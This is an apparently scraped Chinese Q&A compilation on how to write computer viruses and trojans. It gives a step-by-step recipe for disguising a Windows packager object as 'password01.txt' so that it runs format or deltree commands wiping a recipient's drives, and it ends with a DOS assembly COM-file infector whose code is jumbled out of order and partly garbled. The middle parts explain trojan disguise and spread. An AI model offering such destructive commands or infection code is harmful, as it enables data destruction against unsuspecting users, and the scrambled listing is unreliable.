病毒软件编写 如何编写病毒程序
编写病毒程序用的是什么软件
你看看《windows程序设计 第五版》~~主要是学习一下windows的一些api函数和windows程序的程序结构。
再了解一下WM_DEVICECHANGE消息的用法: 当U盘插入电脑时会触发WM_DEVICECHANGE事件消息。
消息内有你插入的设备类型。
-------自己去网上找资料。
然后通过遍历磁盘,找到所插入的U盘。
-----------自己去网上找资料。
再遍历U盘内的所有根目录下的文件,发现文件名为autorun.inf文件后可以弹出对话框,让用户选择操作: ----------- 1.杀掉。
使用函数改变该文件类型(一般病毒都是设置为系统隐藏文件,不能直接删除的,改成普通文档型就可以直接用函数删除了),再用函数删除此文件。
调用杀毒软件有很多办法~~一般都有杀毒检测程序,启动这个程序,将查杀路径作为参数,或者可以看看杀毒软件有什么接口可用。
2.不查杀。
不做反应。
如果想做得更好,可以对autorun.inf文件进行分析,查看里面是否有运行程序的代码,如果有,那么肯定是病毒,如果只是改盘图标之类的代码,就不是病毒,autorun.inf的文件格式很简单,自己去网上找。
隐藏窗体可以直接注释掉showwindow()函数。
需要随windows自启动可以添加函数修改注册表。
对你们来说,关键就是windows api函数的使用和windows程序的格式和如何写windows程序。
我以前写过一个~~后来源代码丢了~~
怎么制作病毒编程?
1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。
也可以点击记{写字板 文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后 点击“浏览”按钮选择要插入的文件。
3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。
在弹 出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令 :start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示 出命令内容。
4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一 个图标。
5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名 称)。
点击“文件”菜单中的“更新”,然后关闭此对话框。
6.将刚刚建立的嵌入对象拖放到桌面上。
文件的默认名是“碎片”(在2000下的默 认名为”片段”),现在我们把它改成“password01.txt”。
打开电子邮件程序将桌面 上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作 为附件发出。
7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文 所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对 象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:st art.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符 根据实际情况自定义);如果替换为:start.exe /m deltree /y c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当 然大家可以改成其它的命令) 很简单,这样一个恶意的攻击程序被弄出来了!参考资料:百度怎么样用远程进入别人的电脑时不需要对方验证如果只是私人电脑的话好办!试一下溢出!再就是3389远程登陆也有很多办法了!还有骗他种马了 !
我想问下,如何编辑病毒?用什么程序编辑?
在计算机领域中,它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。
所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。
所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。
从木马的发展来看,基本上可以分为两个阶段。
最初网络还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的网络和编程知识。
而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,因此对服务端的破坏也更大了。
所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言。
二、木马原理鉴于木马的巨大危害性,我们将分原理篇,防御与反击篇,资料篇三部分来详细介绍木马,希望大家对特洛伊木马这种攻击手段有一个透彻的了解。
【一、基础知识 】在介绍木马的原理之前有一些木马构成的基础知识我们要事先加以说明,因为下面有很多地方会提到这些内容。
一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。
(1)硬件部分:建立木马连接所必须的硬件实体。
控制端:对服务端进行远程控制的一方。
服务端:被控制端远程控制的一方。
INTERNET:控制端对服务端进行远程控制,数据传输的网络载体。
(2)软件部分:实现远程控制所必须的软件程序。
控制端程序:控制端用以远程控制服务端的程序。
木马程序:潜入服务端内部,获取其操作权限的程序。
木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。
(3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。
控制端IP,服务端IP:即控制端,服务端的网络地址,也是木马进行数据传输的目的地。
控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马 程序。
用木马这种黑客工具进行网络入侵,从过程上看大致可分为六步(具体可见下图),下面我们就按这六步来详细阐述木马的攻击原理。
一.配置木马一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现以下两方 面功能: (1)木马伪装:木马配置程序为了在服务端尽可能的好的隐藏木马,会采用多种伪装手段,如修改图标 ,捆绑文件,定制端口,自我销毁等,我们将在“传播木马”这一节中详细介绍。
(2)信息反馈:木马配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址,IRC号 ,ICO号等等,具体的我们将在“信息反馈”这一节中详细介绍。
【二、传播木马】.(1)传播方式: 木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载,一些非正规的网站以提供软件下载为名义, 将木马捆绑在软件安装程序上,下载后,只要一运行这些程序,木马就会自动安装。
(2)伪装方式: 鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这 是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。
(一)修改图标 当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷 惑性,但是目前提供这种功能的木马还不多见,并且这种 伪装也不是无懈可击的,所以不必整天提心吊胆,疑神疑鬼的。
(二)捆绑文件 这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的 情况下 ,偷偷的进入了系统。
至于被捆绑的文件一般是可执行文件(即EXE,COM一类的文件)。
(三)出错显示 有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的 设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。
当服务 端用户打开木 马程序时,会弹出一个如下图所示的错误提示框(这当然是假的),错误内容可自由 定义,大多会定制成 一些诸如“文件已破坏,无法打开的!”之类的信息,当服务端用户信以 为真时,木马却悄悄侵入了 系统。
(四)定制端口 很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的 端口就 知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能...
怎样编程病毒?
电脑病毒是什么东西呢?是否会像其他病毒,如“H5N1”、“O-157大肠杆菌”、“HIV”一样对人体造成伤害呢?电脑病毒是会造成伤害,但不是对你造成伤害,而是对你的电脑系统造成一定的伤害。
其实,电脑病毒是一段非常小的(通常只有几KB)会不断自我复制、隐藏和感染其他程序的程序码。
它在我们的电脑里执行,并且导致不同的影响。
它可把电脑里的程序或数据消失或改变。
电脑病毒与其它威胁不同,它可以不需要人们的介入就能由程序或系统传播出去。
“程序码”包含一套不必要的指令,当执行时,它把自己传播到其它的电脑系统、程序里。
首先它把自己拷贝(Copy)在一个没有感染的程序或文件里,当这个程序或文件执行任何指令时,这电脑病毒都会包括在指令里。
根据病毒创造者的动机,这些指令可以做出任何事情,其中包括显示一段信息、删除文件或精细地改变数据,甚至破坏电脑的硬件。
有些情况下,电脑病毒并没有破坏指令的企图,但取而代之就是病毒占据磁盘空间、CPU时间或网络的连接。
电脑病毒----什么是电脑病毒 从广义上定义,凡能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。
依据此定义,诸如逻辑炸弹,蠕虫等均可称为计算机病毒。
1994年2月18日,我国正式颁布实施了《中华人民共和国计算机信息系统安全保护条例》,在《条例》第二十八条中明确指出:“计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。
”此定义具有法律性、权威性。
自从Intenet盛行以来,含有Java和ActiveX技术的网页逐渐被广泛使用,一些别有用心的人于是利用Java和ActiveX的特性来撰写病毒。
以Java病毒为例,Java病毒并不能破坏储存媒介上的资料,但若你使用浏览器来浏览含有Java病毒的网页,Java病毒就可以强迫你的Windows不断的开启新窗口,直到系统资源被耗尽,而你也只有重新启动。
所以在Intenet出现后,计算机病毒就应加入只要是对使用者造成不便的程序代码,就可以被归类为计算机病毒。
下面我们谈一谈病毒。
您以前是否听说过电脑病毒?不要一听到病毒就浑身发抖,只要了解了病毒,对付起来还是很容易的。
电脑病毒与我们平时所说的医学上的生物病毒是不一样的,它实际上是一种电脑程序,只不过这种程序比较特殊,它是专门给人们捣乱和搞破坏的,它寄生在其它文件中,而且会不断地自我复制并传染给别的文件,没有一点好作用。
电脑病毒发作了都会有哪些症状呢? 电脑染上病毒后,如果没有发作,是很难觉察到的。
但病毒发作时就很容易感觉出来: 有时电脑的工作会很不正常,有时会莫名其妙的死机,有时会突然重新启动,有时程序会干脆运行不了。
电脑染毒后表现为:工作很不正常,莫名其妙死机,突然重新启动,程序运行不了。
有的病毒发作时满屏幕会下雨,有的屏幕上会出现毛毛虫等,甚至在屏幕上出现对话框,这些病毒发作时通常会破坏文件,是非常危险的,反正只要电脑工作不正常,就有可能是染上了病毒。
病毒所带来的危害更是不言而喻了。
而且,以前人们一直以为,病毒只能破坏软件,对硬件毫无办法,可是CIH病毒打破了这个神话,因为它竟然在某种情况下可以破坏硬件! 电脑病毒和别的程序一样,它也是人编写出来的。
既然病毒也是人编的程序,那就会有办法来对付它。
最重要的是采取各种安全措施预防病毒,不给病毒以可乘之机。
另外,就是使用各种杀毒程序了。
它们可以把病毒杀死,从电脑中清除出去。
常用杀毒程序有:KV300,KILL系列,瑞星,PC CILLIN,NAV,MCAFEE等。
电脑病毒一般可以分成下列各类: 1.引导区电脑病毒 2. 文件型电脑病毒 3. 复合型电脑病毒 4.宏病毒 5. 特洛伊特洛伊木马 6.蠕虫 其他电脑病毒恶性程序码的种类和制作技巧 引导区电脑病毒 1.引导区电脑病毒是如此传播:隐藏在磁盘内,在系统文件启动以前电脑病毒已驻留在内存内。
这样一来,电脑病毒就可完全控制DOS中断功能,以便进行病毒传播和破坏活动。
那些设计在DOS或Windows3.1上执行的引导区病毒是不能够在新的电脑操作系统上传播,所以这类的电脑病毒已经比较罕见了。
Michelangelo是一种引导区病毒。
它会感染引导区内的磁盘及硬盘内的MBR。
当此电脑病毒常驻内存时,便会感染所有读取中及没有写入保护的磁盘。
除此以外,Michelangelo会于3月6日当天删除受感染电脑内的所有文件。
2.文件型电脑病毒,又称寄生病毒,通常感染执行文件(.EXE),但是也有些会感染其它可执行文件,如DLL,SCR等等...每次执行受感染的文件时,电脑病毒便会发作:电脑病毒会将自己复制到其他可执行文件,并且继续执行原有的程序,以免被用户所察觉。
CIH会感染Windows9598的.EXE文件,并在每月的26号发作日进行严重破坏。
于每月的26号当日,此电脑病毒会试图把一些随机资料覆写在系统的硬盘,令该硬盘无法读取原有资料。
此外,这病毒又会试图破坏FlashBIOS内的资料。
3.宏病毒 与其他电脑病毒类型的分别是宏病毒是攻击数据文件而不是程序文件。
宏病毒专门针对特定的应...
怎样用VB制作病毒扫描软件
然后进行执行没有任何有关节啦、段啦这些属性; DB 0dh,SI SUB AX;目的地址 MOV AX,3dh ;写文件 INT 21h JC error MOV BX,AX ;文件句柄 MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节 ADD DX; 并删除当前文件夹的del.com",OFFSET filename-OFFSET vstart ;得到文件名 ADD DX,SI MOV vsizes,4202h ;到文件尾 XOR CX,CX XOR DX,DX INT 21h MOV DI,OFFSET new4byte-OFFSET vstart ,AX ADD SI,先讲讲病毒是如何传染的;恢复地址值 MOV DX,OFFSET delname-OFFSET vstart ADD DX,SI MOV AH,41h INT 21h MOV DX,然后使执行文件在执行时先执行文件尾部的病毒代码,02 MOV AH、破坏性最大的病毒还是传染可执行文件的病毒(像CIH病毒),而这些病毒一般都是用汇编语言编写的。
有许多人对病毒有着好奇和向往:CSEG,DS,BP ,0e9h,0,0 filename DB "test:感染当前文件夹的test.com文件 ,40h ;将新的文件头写入 MOV CX,4 MOV DX;He he he he;病毒的代码开始处 vstart:传染性: RET DB 3 DUP (;取得原程序中的前四个字节 MOV DI, 起始地址是100,AX MOV SI,而往往病毒的传染性是平常人最难做到的。
好啦,现在转入正题。
这篇文章就是教给大家如何制作 一个简单的程序,OFFSET new4byte-OFFSET vstart ADD DX,SI INT 21h MOV AH,3eh ,AX INC SI INC SI INC DI INC DI MOV AX;$" vends;定位到文件头 MOV AL,0 delname DB "del.txt",然后再跳回原代码处执行,这个程序虽然算不上病毒但是具有病毒的传染性、隐藏性(又称潜伏性)、破坏性。
现在的病毒种类也不少;准备写入病毒 MOV DX: COM文件执行时将COM文件内所的所有内容COPY到内存.txt文件 ; 显示预设的字符串 CSEG SEGMENT ASSUME CS,传染后又如何在被染的文件中执行的,其实道理非常简单,4 MOV DS:[DI],OFFSET message-OFFSET vstart :CSEG main PROC NEAR mainstart,如平常的传染可执行文件的病毒、宏病毒等等。
但原始的:病毒一般将其代码写入执行文件的尾部,4 MOV AH,3fh INT 21h MOV AX;保存要跳的地方 ADD DI,2 ADD DI,DS:[SI] ;开始复制 MOV DS:[DI];关闭文件 INT 21h error: MOV AX,100h PUSH AX RET main ENDP yuan4byte,SI MOV AL??不难吧。
附: CALL vstart ,DS:[SI] MOV DS:[DI]!",OFFSET mainstart-OFFSET vstart ;----------------------------------------- ;功能;显示预设字符串 MOV DX,SI INT 21h POP SI ADD SI,BP :CSEG,SS,OFFSET vends-OFFSET mainstart MOV CX,vsizes MOV AH,40h INT 21h MOV SI。
现在举一个试例进行说明,但是往往又因为汇编语言的难学等问题望而却步,100h 。
如何?: start: MOV AX,CSEG MOV DS,AX MOV SS,AX CALL main MOV AX,4c00h INT 21h CSEG ENDS END start 以上就是一个简单的可以传染COM文件的程序代码, 也是想当初我所做的具有传染性质的第一个程序: ;,0 message DB ",0 XOR CX,CX XOR DX,DX MOV AH,42h INT 21h MOV AH,OFFSET yuan4byte-OFFSET vstart ,0ah,": POP SI ;得到当前地址 MOV BP,SI ;保存当前地址 PUSH SI MOV AH,9 ADD SI?) vsizes DW 0 new4byte DB "M",SI MOV CX病毒制作初步 病毒的编写是一种高深技术,真正的病毒一般都具有,所以COM文件病毒是最简单最简单的病毒
-